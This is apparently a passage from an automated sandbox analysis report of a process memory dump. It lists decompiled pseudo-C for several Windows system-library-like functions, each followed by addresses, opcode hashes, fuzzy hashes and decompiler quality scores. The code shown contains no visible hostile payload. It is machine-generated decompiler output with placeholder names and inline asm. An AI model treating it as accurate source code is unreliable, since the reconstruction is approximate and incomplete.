				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}


















                                                0x0161a61c
                                                0x0161a61e
                                                0x0161a623
                                                0x0161a628
                                                0x0161a62b
                                                0x0161a62d
                                                0x0161a648
                                                0x0161a64a
                                                0x0161a64f
                                                0x01659b44
                                                0x0161a6ec
                                                0x0161a6f1
                                                0x0161a6f1
                                                0x0161a655
                                                0x0161a657
                                                0x0161a65a
                                                0x0161a65d
                                                0x0161a662
                                                0x0161a663
                                                0x0161a667
                                                0x0161a668
                                                0x0161a66d
                                                0x0161a706
                                                0x0161a706
                                                0x01659bda
                                                0x01659be6
                                                0x01659beb
                                                0x00000000
                                                0x01659beb
                                                0x0161a679
                                                0x01659b7a
                                                0x00000000
                                                0x01659b7a
                                                0x0161a683
                                                0x0161a6f4
                                                0x0161a6f7
                                                0x0161a6f9
                                                0x0161a6fd
                                                0x0161a6a0
                                                0x0161a6a0
                                                0x0161a6ad
                                                0x0161a6af
                                                0x0161a6b4
                                                0x01659ba7
                                                0x01659bac
                                                0x00000000
                                                0x00000000
                                                0x01659bc6
                                                0x01659bce
                                                0x01659bd1
                                                0x01659bd3
                                                0x01659bd3
                                                0x00000000
                                                0x01659bd1
                                                0x0161a6bd
                                                0x0161a6c3
                                                0x0161a6c6
                                                0x0161a6d2
                                                0x0161a701
                                                0x0161a704
                                                0x00000000
                                                0x0161a704
                                                0x0161a6d4
                                                0x0161a6d6
                                                0x0161a6d9
                                                0x0161a6db
                                                0x0161a6e1
                                                0x0161a6e6
                                                0x0161a6e8
                                                0x0161a6e8
                                                0x0161a6ea
                                                0x00000000
                                                0x0161a6ea
                                                0x0161a688
                                                0x0161a692
                                                0x0161a694
                                                0x0161a699
                                                0x00000000
                                                0x00000000
                                                0x0161a69d
                                                0x00000000

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 84307068b5e265edb89e0a95e94315004792d709b47bddda55906df1a6970db2
                                                • Instruction ID: 2c5bab0cac01af5c0e00208569471c3ee4793da5e87cde47107f6174b966b0ff
                                                • Opcode Fuzzy Hash: 84307068b5e265edb89e0a95e94315004792d709b47bddda55906df1a6970db2
                                                • Instruction Fuzzy Hash: 6C418EB5A01355DFDB15CF98CC80BA9BBF2BB49304F1980ADE905AB348D774A901CB94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0160C182, Relevance: .1, Instructions: 104COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 68%
                                                			E0160C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E01607D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E016B8D34(_v8, _t80);
					}
					E01602280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E015FFFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E016B8833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E015FFFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E0162B180();
						if(_a4 != 0) {
							E01602280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E0160BB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E0160BB2D(_t16, _t15);
						E0160B944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E015FFFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E015FFFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E015FFFB0(0, __ecx, _t24);
				}
				return 0;
			}
















                                                0x0160c18d
                                                0x0160c18f
                                                0x0160c191
                                                0x0160c19b
                                                0x0160c1a0
                                                0x0160c1d4
                                                0x0160c1de
                                                0x01652d6e
                                                0x0160c1e4
                                                0x0160c1e4
                                                0x0160c1e4
                                                0x0160c1ec
                                                0x01652d7d
                                                0x01652d7d
                                                0x0160c1f3
                                                0x0160c1ff
                                                0x01652d88
                                                0x01652d8d
                                                0x01652d94
                                                0x01652d94
                                                0x01652d9f
                                                0x01652da4
                                                0x01652dab
                                                0x01652db0
                                                0x01652db2
                                                0x01652db3
                                                0x01652db4
                                                0x01652dbc
                                                0x01652dc3
                                                0x01652dc3
                                                0x0160c205
                                                0x0160c205
                                                0x0160c208
                                                0x0160c20e
                                                0x0160c211
                                                0x0160c216
                                                0x0160c219
                                                0x0160c21f
                                                0x0160c222
                                                0x0160c22c
                                                0x0160c234
                                                0x0160c23a
                                                0x0160c23f
                                                0x0160c245
                                                0x0160c24b
                                                0x0160c251
                                                0x0160c25a
                                                0x0160c276
                                                0x0160c27d
                                                0x0160c27d
                                                0x0160c25c
                                                0x0160c25c
                                                0x00000000
                                                0x0160c25e
                                                0x0160c1a4
                                                0x0160c1aa
                                                0x0160c1b3
                                                0x0160c265
                                                0x0160c26c
                                                0x0160c26c
                                                0x00000000

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                • Instruction ID: d09ff4453cceff34d695f330f8dfae5ad947068c92786f120cf0c37bf4c4a6d0
                                                • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                • Instruction Fuzzy Hash: FA310672601547AED70AEBB4CC90BEAFB55BF52204F04829ED51C5B381DB346A4ACBE4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01667016, Relevance: .1, Instructions: 104COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 76%
                                                			E01667016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x16dd360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E01666B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E01666B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E01607D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E01629AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E0162B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L01604620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}






















                                                0x01667016
                                                0x0166701e
                                                0x0166702b
                                                0x01667033
                                                0x01667037
                                                0x0166703c
                                                0x0166703e
                                                0x01667041
                                                0x01667045
                                                0x0166704a
                                                0x01667050
                                                0x01667055
                                                0x0166705a
                                                0x01667062
                                                0x01667062
                                                0x0166705a
                                                0x01667064
                                                0x01667064
                                                0x01667067
                                                0x01667071
                                                0x01667096
                                                0x0166709b
                                                0x016670a2
                                                0x016670a6
                                                0x016670a7
                                                0x016670ad
                                                0x016670b3
                                                0x016670b6
                                                0x016670bb
                                                0x016670c3
                                                0x016670c3
                                                0x016670c6
                                                0x016670cd
                                                0x016670dd
                                                0x016670e0
                                                0x016670e2
                                                0x016670e2
                                                0x016670ee
                                                0x01667101
                                                0x016670f0
                                                0x016670f9
                                                0x016670f9
                                                0x0166710a
                                                0x0166710e
                                                0x01667112
                                                0x01667117
                                                0x01667118
                                                0x01667118
                                                0x016670bb
                                                0x0166711d
                                                0x01667123
                                                0x01667131
                                                0x01667131
                                                0x01667136
                                                0x0166713d
                                                0x0166713e
                                                0x0166713f
                                                0x0166714a
                                                0x0166714a
                                                0x01667084
                                                0x01667088
                                                0x00000000
                                                0x0166708e
                                                0x0166708e
                                                0x01667092
                                                0x00000000
                                                0x01667092

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 30f0bb63220e56700a06a6f1ddcb6bab99fc228aefc0c9b0651da2a6fa4c3981
                                                • Instruction ID: 0f4fa2ba58bd7fbc57702d49baf71bb3a4dc048091012bb306f14135fe1dcce1
                                                • Opcode Fuzzy Hash: 30f0bb63220e56700a06a6f1ddcb6bab99fc228aefc0c9b0651da2a6fa4c3981
                                                • Instruction Fuzzy Hash: E431B1726047919BC321DF28CD40A6BB7EAFF98704F044A2DF99587790E730E914CBA6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0161A70E, Relevance: .1, Instructions: 96COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 92%
                                                			E0161A70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x16d7b10; // 0x0
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x16d7b10 = 8;
					 *0x16d7b14 = 0x16d7b0c;
					 *0x16d7b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x1
					E0161A990(0x16d7b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L0161A840(__edx, __ecx, __ecx, _t52, 0x16d7b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x16d7b10; // 0x0
					_t3 = _t37 + 0x27; // 0x27
					__eflags = _t3 >> 5 -  *0x16d7b18; // 0x0
					if(__eflags > 0) {
						_t38 =  *0x16d7b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x27
						_v8 = _t4 >> 5;
						_t50 = L01604620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x16d7b18 = _v8;
						_t8 = _t52 + 7; // 0x7
						E0162F3E0(_t50,  *0x16d7b14, _t8 >> 3);
						_t28 =  *0x16d7b14; // 0x0
						__eflags = _t28 - 0x16d7b0c;
						if(_t28 != 0x16d7b0c) {
							L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x8
						 *0x16d7b14 = _t50;
						_t48 = _v12;
						 *0x16d7b10 = _t9;
						goto L6;
					}
					 *0x16d7b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}
















                                                0x0161a713
                                                0x0161a714
                                                0x0161a717
                                                0x0161a71d
                                                0x0161a720
                                                0x0161a722
                                                0x0161a727
                                                0x0161a74a
                                                0x0161a754
                                                0x0161a75e
                                                0x0161a768
                                                0x0161a76a
                                                0x0161a773
                                                0x0161a78b
                                                0x0161a790
                                                0x0161a792
                                                0x0161a741
                                                0x0161a741
                                                0x0161a743
                                                0x0161a749
                                                0x0161a749
                                                0x0161a732
                                                0x0161a73a
                                                0x0161a797
                                                0x0161a79d
                                                0x0161a7a3
                                                0x0161a7a9
                                                0x0161a7b6
                                                0x0161a7bc
                                                0x0161a7ca
                                                0x0161a7e0
                                                0x0161a7e2
                                                0x0161a7e4
                                                0x01659bf2
                                                0x00000000
                                                0x01659bf2
                                                0x0161a7ed
                                                0x0161a7f2
                                                0x0161a800
                                                0x0161a805
                                                0x0161a80d
                                                0x0161a812
                                                0x01659c08
                                                0x01659c08
                                                0x0161a818
                                                0x0161a81b
                                                0x0161a821
                                                0x0161a824
                                                0x00000000
                                                0x0161a824
                                                0x0161a7ae
                                                0x00000000
                                                0x0161a7ae
                                                0x0161a73c
                                                0x0161a73e
                                                0x00000000

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f66ac8e0932086ee63fd88cade6af146abf39f0d592f845ddfa29607ab4e79ab
                                                • Instruction ID: bc9b67a189b0677911b62803d81c31278a764582c2f281e32f66c3f20529b8ba
                                                • Opcode Fuzzy Hash: f66ac8e0932086ee63fd88cade6af146abf39f0d592f845ddfa29607ab4e79ab
                                                • Instruction Fuzzy Hash: D831F3B5A02241DFD721CF48DC80F267BF9FB84718F18095AEA46C7348D770AA11CB92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 016161A0, Relevance: .1, Instructions: 93COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 97%
                                                			E016161A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E01615E50(0x15c67cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E016B9D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E015EF7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}



















                                                0x016161b3
                                                0x016161b5
                                                0x016161bd
                                                0x016161c3
                                                0x016161c7
                                                0x016161d2
                                                0x016161ff
                                                0x016161ff
                                                0x01616201
                                                0x01616207
                                                0x01616207
                                                0x016161d4
                                                0x016161d9
                                                0x00000000
                                                0x00000000
                                                0x016161df
                                                0x016161e2
                                                0x00000000
                                                0x00000000
                                                0x016161e6
                                                0x016161e8
                                                0x016161ee
                                                0x016161ee
                                                0x016161f9
                                                0x0165762f
                                                0x01657632
                                                0x01657635
                                                0x01657639
                                                0x01657640
                                                0x0165766e
                                                0x01657675
                                                0x00000000
                                                0x00000000
                                                0x01657681
                                                0x01657689
                                                0x0165768d
                                                0x01657691
                                                0x01657695
                                                0x01657699
                                                0x016576af
                                                0x016576b5
                                                0x016576b7
                                                0x016576b7
                                                0x016576d7
                                                0x016576dc
                                                0x00000000
                                                0x016576dc
                                                0x016576a2
                                                0x016576a9
                                                0x01657651
                                                0x01657653
                                                0x01657653
                                                0x01657656
                                                0x01657656
                                                0x00000000
                                                0x01657656
                                                0x01657644
                                                0x01657646
                                                0x01657648
                                                0x01657648
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9881fb17b80cfbecaa8350727797df4a49cfc0607f81f74dd4a441f77121d617
                                                • Instruction ID: 40dcc2e44d50e5dce0f34b4216db8fbc62713d348007feb4eb2bc8c4e2f76435
                                                • Opcode Fuzzy Hash: 9881fb17b80cfbecaa8350727797df4a49cfc0607f81f74dd4a441f77121d617
                                                • Instruction Fuzzy Hash: 7A317A716057118FE360CF1DCC40B26BBE5FB88B00F49496DE9989B351E7B0E904CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 015EAA16, Relevance: .1, Instructions: 93COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b278b200f04feabcf9fb3611876ef3bb2cd867652f22bdcdacdaf86e3377907c
                                                • Instruction ID: 413087d5b9f8d88f7ea01037227f149a3778fe20d8dbb63949766d0f65926af1
                                                • Opcode Fuzzy Hash: b278b200f04feabcf9fb3611876ef3bb2cd867652f22bdcdacdaf86e3377907c
                                                • Instruction Fuzzy Hash: BA31D471A0062AABCB159FA8CD41A7FB7B9FF44700B01446DF901DB240EB749D11CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01624A2C, Relevance: .1, Instructions: 92COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 58%
                                                			E01624A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x16dd360 ^ _t62;
				_v8 =  *0x16dd360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E01602280(_t26, 0x16d8608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E015FFFB0(_t41, _t51, 0x16d8608);
						L2:
						 *0x16db1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E0162B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E01602280(_t28, 0x16d8608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E015FFFB0(_t42, _t53, 0x16d8608);
							if(_t53 != 0) {
								L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E015FFFB0(_t41, _t51, 0x16d8608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}
























                                                0x01624a2c
                                                0x01624a34
                                                0x01624a3c
                                                0x01624a3e
                                                0x01624a48
                                                0x01624a4b
                                                0x01624a4d
                                                0x01624a51
                                                0x01624a9c
                                                0x00000000
                                                0x00000000
                                                0x01624aa3
                                                0x01624aa8
                                                0x01624aad
                                                0x01624ab1
                                                0x01624ade
                                                0x01624ae3
                                                0x01624a5a
                                                0x01624a62
                                                0x01624a6a
                                                0x01624a6e
                                                0x0165f203
                                                0x01624a84
                                                0x01624a88
                                                0x01624a89
                                                0x01624a8a
                                                0x01624a95
                                                0x01624a95
                                                0x01624a79
                                                0x01624a80
                                                0x01624af2
                                                0x01624af4
                                                0x01624af9
                                                0x01624aff
                                                0x01624b01
                                                0x01624b03
                                                0x01624b08
                                                0x0165f20a
                                                0x0165f212
                                                0x0165f216
                                                0x0165f216
                                                0x01624b08
                                                0x01624b13
                                                0x01624b1a
                                                0x0165f229
                                                0x0165f229
                                                0x01624b1a
                                                0x01624a82
                                                0x00000000
                                                0x01624a82
                                                0x01624ab7
                                                0x01624acd
                                                0x01624acd
                                                0x01624ad5
                                                0x01624ada
                                                0x00000000
                                                0x01624ada
                                                0x01624ac2
                                                0x01624acb
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01624acb
                                                0x01624a53
                                                0x01624a53
                                                0x01624a58
                                                0x00000000

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9419261e5d76074e44c2c77b7bd34dcf4b6fa73ae8dddd135c7412bbfc5785fc
                                                • Instruction ID: 98459ed44c92406825f789c3645a15643fc037fd463d813b1fd4454c0ca8bd96
                                                • Opcode Fuzzy Hash: 9419261e5d76074e44c2c77b7bd34dcf4b6fa73ae8dddd135c7412bbfc5785fc
                                                • Instruction Fuzzy Hash: 79310232602AA29BC7229F59CD44B2ABBA9FFC1710F00446DED564B745CBB0D804CF85
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01628EC7, Relevance: .1, Instructions: 92COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9a6ca985bcfc3a9186867414ba23880cfb3d8381e07c97a31fe4b1de2eac3eda
                                                • Instruction ID: d56c8f58a6c71818a1936abfb10991abfd625a96f6a1d4d41b6b3df8715b71f8
                                                • Opcode Fuzzy Hash: 9a6ca985bcfc3a9186867414ba23880cfb3d8381e07c97a31fe4b1de2eac3eda
                                                • Instruction Fuzzy Hash: 4E41B1B1D006289FDB20CFAAD980AADFBF8FB48310F5041AEE509A7600EB745A44CF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0161E730, Relevance: .1, Instructions: 89COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 74%
                                                			E0161E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E01629670() < 0) {
					L0163DF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x16d7b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L01604620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M0161E810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

















                                                0x0161e730
                                                0x0161e736
                                                0x0161e738
                                                0x0161e73d
                                                0x0161e73e
                                                0x0161e740
                                                0x0161e749
                                                0x0161e765
                                                0x0161e76a
                                                0x0161e76b
                                                0x0161e76c
                                                0x0161e76d
                                                0x0161e76e
                                                0x0161e76f
                                                0x0161e775
                                                0x0161e777
                                                0x0161e77e
                                                0x0165b675
                                                0x0161e784
                                                0x0161e784
